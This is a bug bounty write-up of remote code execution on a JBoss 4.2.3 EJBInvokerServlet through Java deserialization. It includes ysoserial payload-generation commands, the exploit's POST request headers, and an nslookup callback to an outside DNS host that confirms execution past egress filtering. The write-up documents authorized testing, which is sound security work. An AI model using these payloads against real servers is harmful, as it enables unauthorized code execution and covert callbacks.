First off, I would just like to reference the following sites/authors/tools for helping guide me along this route and providing a sweet tool to make this easy:
I ran into a JMXInvokerServlet/EJBInvokerServlet on a private bug bounty. Generally with these, you can just deploy a JSP shell and be done with it. I was running into some issues with this method and I’m not exactly sure why. However, I was still able to get RCE via this version of JBoss (4.2.3) being vulnerable to the Java Deserialization issue. There was egress filtering on this Windows host that didn’t allow me to perform http, ftp, or telnet. I was able to do DNS lookups though which will be shown at the end. I was able to determine it was a windows host due to some file not found-ish error messages.
Steps to Exploit
- Grab a copy of ysoserial
- Dump your payload into a file:
$ java -jar ysoserial-0.0.4-all.jar CommonsCollections1 ‘fake.exe’ > serialdata
- If you’ll notice, I used ‘fake.exe’ as an example. Originally I was running commands like wget, curl, python, perl, etc. and I would receive some errors in the serialized response, “The system cannot find the file specified.”
- To create your POST request for the endpoint use the following headers:
POST /invoker/EJBInvokerServlet HTTP/1.1
ContentType: application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
- Right click inside the request tab in Repeater and select ‘Paste from file’ and select the file containing serialized data.
- Response (‘cannot find file’ is present):
- I then decided to try cmd.exe
$ java -jar ysoserial-0.0.4-all.jar CommonsCollections1 ‘cmd.exe’ > serialdata
- Response (‘cannot find file’ is not present):
- From these responses, we can gather that I am able to run cmd.exe. At this point I tried a couple ways of outbound connections; however, I was only able to get DNS lookups to work. Thank you @dawgyg for letting me use your DNS server!
$ java -jar ysoserial-0.0.4-all.jar CommonsCollections1 ‘nslookup mealstest.example.com’ > serialtest
- External DNS server logs:
$ sudo tail -f /var/log/messages
Jul 22 00:10:00 server named: client 18x.x.x.x#33347: query: mealstest.example.com IN A -EDC (10.0.5.200)
- I suspect I might have been able to copy over dnscat line by line then run the code. However I am short on time and the RCE was already proven .